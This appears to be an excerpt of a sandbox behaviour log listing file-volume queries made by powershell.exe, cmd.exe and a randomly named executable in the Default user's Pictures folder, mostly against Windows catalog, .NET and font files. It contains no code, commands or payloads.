Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
